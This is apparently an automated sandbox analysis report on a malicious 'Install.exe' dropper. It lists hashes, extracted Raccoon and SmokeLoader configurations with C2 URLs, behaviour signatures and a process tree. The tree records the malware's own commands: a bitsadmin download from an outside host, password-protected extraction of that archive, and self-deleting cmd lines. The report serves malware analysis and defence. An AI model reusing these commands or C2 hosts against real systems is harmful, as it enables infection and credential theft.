Resubmissions

24-04-2021 06:39

210424-lmjja25q22 10

23-04-2021 19:10

210423-f6mvfx4yyx 10

23-04-2021 19:10

210423-3qnl3etjca 10

23-04-2021 18:20

210423-4keqsccdba 10

23-04-2021 13:38

210423-1f2d5v8a2s 10

23-04-2021 04:53

210423-eenyvz5kqj 10

23-04-2021 04:53

210423-svr8rrwggs 10

23-04-2021 04:53

210423-95h13plc2x 10

22-04-2021 19:11

210422-6s1zd291s6 10

22-04-2021 19:05

210422-dsvj9bzkvn 10

Analysis

  • max time kernel
    1801s
  • max time network
    1758s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-04-2021 06:39

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Nirsoft 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 36 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:352
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
      1⤵
        PID:1276
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Themes
        1⤵
          PID:1228
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s SENS
          1⤵
            PID:1352
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
              PID:2864
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
                PID:2644
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2616
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2472
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2456
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                  1⤵
                    PID:1852
                  • C:\Users\Admin\AppData\Local\Temp\Install.exe
                    "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4036
                    • C:\Users\Admin\AppData\Local\Temp\is-23TG6.tmp\Install.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-23TG6.tmp\Install.tmp" /SL5="$20110,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:832
                      • C:\Users\Admin\AppData\Local\Temp\is-HCQSC.tmp\Ultra.exe
                        "C:\Users\Admin\AppData\Local\Temp\is-HCQSC.tmp\Ultra.exe" /S /UID=burnerch1
                        3⤵
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3164
                        • C:\Program Files\Internet Explorer\TSPGZDEMIF\ultramediaburner.exe
                          "C:\Program Files\Internet Explorer\TSPGZDEMIF\ultramediaburner.exe" /VERYSILENT
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:3564
                          • C:\Users\Admin\AppData\Local\Temp\is-97CJ9.tmp\ultramediaburner.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-97CJ9.tmp\ultramediaburner.tmp" /SL5="$5005C,281924,62464,C:\Program Files\Internet Explorer\TSPGZDEMIF\ultramediaburner.exe" /VERYSILENT
                            5⤵
                            • Executes dropped EXE
                            • Drops file in Program Files directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of WriteProcessMemory
                            PID:2272
                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                              6⤵
                              • Executes dropped EXE
                              PID:3680
                        • C:\Users\Admin\AppData\Local\Temp\70-61c48-7f2-468bc-9d6adcf70f884\Cumizhesyna.exe
                          "C:\Users\Admin\AppData\Local\Temp\70-61c48-7f2-468bc-9d6adcf70f884\Cumizhesyna.exe"
                          4⤵
                          • Executes dropped EXE
                          • Checks computer location settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3820
                        • C:\Users\Admin\AppData\Local\Temp\78-c1a35-319-69789-e99be5ff44600\ZHuzhosizhisy.exe
                          "C:\Users\Admin\AppData\Local\Temp\78-c1a35-319-69789-e99be5ff44600\ZHuzhosizhisy.exe"
                          4⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2044
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jhltmwy2.0dk\instEU.exe & exit
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4360
                            • C:\Users\Admin\AppData\Local\Temp\jhltmwy2.0dk\instEU.exe
                              C:\Users\Admin\AppData\Local\Temp\jhltmwy2.0dk\instEU.exe
                              6⤵
                              • Executes dropped EXE
                              PID:4528
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yurrpk52.mln\md1_1eaf.exe & exit
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4584
                            • C:\Users\Admin\AppData\Local\Temp\yurrpk52.mln\md1_1eaf.exe
                              C:\Users\Admin\AppData\Local\Temp\yurrpk52.mln\md1_1eaf.exe
                              6⤵
                              • Executes dropped EXE
                              • Checks whether UAC is enabled
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3848
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rpv2dmey.imk\google-game.exe & exit
                            5⤵
                              PID:6056
                              • C:\Users\Admin\AppData\Local\Temp\rpv2dmey.imk\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\rpv2dmey.imk\google-game.exe
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:3040
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                  7⤵
                                  • Loads dropped DLL
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:5168
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mwxd5der.nda\y1.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:5824
                              • C:\Users\Admin\AppData\Local\Temp\mwxd5der.nda\y1.exe
                                C:\Users\Admin\AppData\Local\Temp\mwxd5der.nda\y1.exe
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:5288
                                • C:\Users\Admin\AppData\Local\Temp\E38liCydRz.exe
                                  "C:\Users\Admin\AppData\Local\Temp\E38liCydRz.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  PID:2312
                                  • C:\Users\Admin\AppData\Roaming\1619246247774.exe
                                    "C:\Users\Admin\AppData\Roaming\1619246247774.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619246247774.txt"
                                    8⤵
                                    • Executes dropped EXE
                                    PID:4220
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\E38liCydRz.exe"
                                    8⤵
                                      PID:5976
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping 127.0.0.1 -n 3
                                        9⤵
                                        • Runs ping.exe
                                        PID:6028
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\mwxd5der.nda\y1.exe"
                                    7⤵
                                      PID:5780
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        8⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:6056
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /T 10 /NOBREAK
                                        8⤵
                                        • Delays execution with timeout.exe
                                        PID:5900
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fk41dlfl.phd\inst.exe & exit
                                  5⤵
                                    PID:5236
                                    • C:\Users\Admin\AppData\Local\Temp\fk41dlfl.phd\inst.exe
                                      C:\Users\Admin\AppData\Local\Temp\fk41dlfl.phd\inst.exe
                                      6⤵
                                      • Executes dropped EXE
                                      PID:5524
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\11xtrifq.dkc\SunLabsPlayer.exe /S & exit
                                    5⤵
                                      PID:5376
                                      • C:\Users\Admin\AppData\Local\Temp\11xtrifq.dkc\SunLabsPlayer.exe
                                        C:\Users\Admin\AppData\Local\Temp\11xtrifq.dkc\SunLabsPlayer.exe /S
                                        6⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Drops file in Program Files directory
                                        PID:5200
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                          7⤵
                                            PID:5972
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                            7⤵
                                              PID:5600
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                              7⤵
                                                PID:5072
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:5108
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:4868
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:5416
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:4600
                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                        7⤵
                                                        • Download via BitsAdmin
                                                        PID:4776
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p8Sn1wY9H1gi4Vlf -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Program Files directory
                                                        PID:4592
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:4772
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3EDfsj3RM1m33yP -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:4504
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5908
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5916
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5380
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:1312
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:824
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll" EaIFXnVstsO
                                                                  7⤵
                                                                  • Loads dropped DLL
                                                                  PID:5936
                                                                  • C:\Windows\system32\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll" EaIFXnVstsO
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    • Drops file in System32 directory
                                                                    PID:2604
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:5856
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:756
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:4292
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:5020
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7DC3.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:5952
                                                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                            "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            PID:4900
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\izsxprm3.l5k\GcleanerWW.exe /mixone & exit
                                                                        5⤵
                                                                          PID:5924
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0wm5pjnm.skj\toolspab1.exe & exit
                                                                          5⤵
                                                                            PID:4956
                                                                            • C:\Users\Admin\AppData\Local\Temp\0wm5pjnm.skj\toolspab1.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\0wm5pjnm.skj\toolspab1.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:5648
                                                                              • C:\Users\Admin\AppData\Local\Temp\0wm5pjnm.skj\toolspab1.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\0wm5pjnm.skj\toolspab1.exe
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:5684
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\43oaa11o.skl\c7ae36fa.exe & exit
                                                                            5⤵
                                                                              PID:5708
                                                                              • C:\Users\Admin\AppData\Local\Temp\43oaa11o.skl\c7ae36fa.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\43oaa11o.skl\c7ae36fa.exe
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:5248
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\23dopnal.lg1\app.exe /8-2222 & exit
                                                                              5⤵
                                                                                PID:6020
                                                                                • C:\Users\Admin\AppData\Local\Temp\23dopnal.lg1\app.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\23dopnal.lg1\app.exe /8-2222
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5604
                                                                                  • C:\Users\Admin\AppData\Local\Temp\23dopnal.lg1\app.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\23dopnal.lg1\app.exe" /8-2222
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies data under HKEY_USERS
                                                                                    PID:184
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                        1⤵
                                                                          PID:1104
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                          1⤵
                                                                          • Drops file in System32 directory
                                                                          PID:928
                                                                          • C:\Users\Admin\AppData\Roaming\uiwwrau
                                                                            C:\Users\Admin\AppData\Roaming\uiwwrau
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:4916
                                                                            • C:\Users\Admin\AppData\Roaming\uiwwrau
                                                                              C:\Users\Admin\AppData\Roaming\uiwwrau
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:4208
                                                                          • C:\Users\Admin\AppData\Roaming\jwwwrau
                                                                            C:\Users\Admin\AppData\Roaming\jwwwrau
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:6004
                                                                          • C:\Users\Admin\AppData\Roaming\uiwwrau
                                                                            C:\Users\Admin\AppData\Roaming\uiwwrau
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:2960
                                                                            • C:\Users\Admin\AppData\Roaming\uiwwrau
                                                                              C:\Users\Admin\AppData\Roaming\uiwwrau
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:4404
                                                                          • C:\Users\Admin\AppData\Roaming\jwwwrau
                                                                            C:\Users\Admin\AppData\Roaming\jwwwrau
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:4860
                                                                          • C:\Users\Admin\AppData\Roaming\uiwwrau
                                                                            C:\Users\Admin\AppData\Roaming\uiwwrau
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:5564
                                                                            • C:\Users\Admin\AppData\Roaming\uiwwrau
                                                                              C:\Users\Admin\AppData\Roaming\uiwwrau
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Checks SCSI registry key(s)
                                                                              PID:4736
                                                                          • C:\Users\Admin\AppData\Roaming\jwwwrau
                                                                            C:\Users\Admin\AppData\Roaming\jwwwrau
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Checks SCSI registry key(s)
                                                                            PID:5252
                                                                          • C:\Windows\system32\rundll32.exe
                                                                            C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll",EaIFXnVstsO
                                                                            2⤵
                                                                            • Windows security modification
                                                                            • Drops file in System32 directory
                                                                            • Modifies data under HKEY_USERS
                                                                            PID:5824
                                                                        • \??\c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                          1⤵
                                                                          • Suspicious use of SetThreadContext
                                                                          • Modifies registry class
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:1804
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                            2⤵
                                                                            • Drops file in System32 directory
                                                                            • Checks processor information in registry
                                                                            • Modifies data under HKEY_USERS
                                                                            • Modifies registry class
                                                                            PID:5420
                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                          1⤵
                                                                          • Drops file in Windows directory
                                                                          • Modifies Internet Explorer settings
                                                                          • Modifies registry class
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:4128
                                                                        • C:\Windows\system32\browser_broker.exe
                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                          1⤵
                                                                          • Modifies Internet Explorer settings
                                                                          PID:4248
                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                          1⤵
                                                                          • Modifies registry class
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4924
                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                          1⤵
                                                                          • Modifies Internet Explorer settings
                                                                          • Modifies registry class
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4244
                                                                        • C:\Windows\system32\werfault.exe
                                                                          werfault.exe /h /shared Global\d6f321e0666d470a8d51fbcb75bba33c /t 4472 /p 4244
                                                                          1⤵
                                                                            PID:4640
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                            • Modifies registry class
                                                                            PID:5680
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                              PID:5776
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
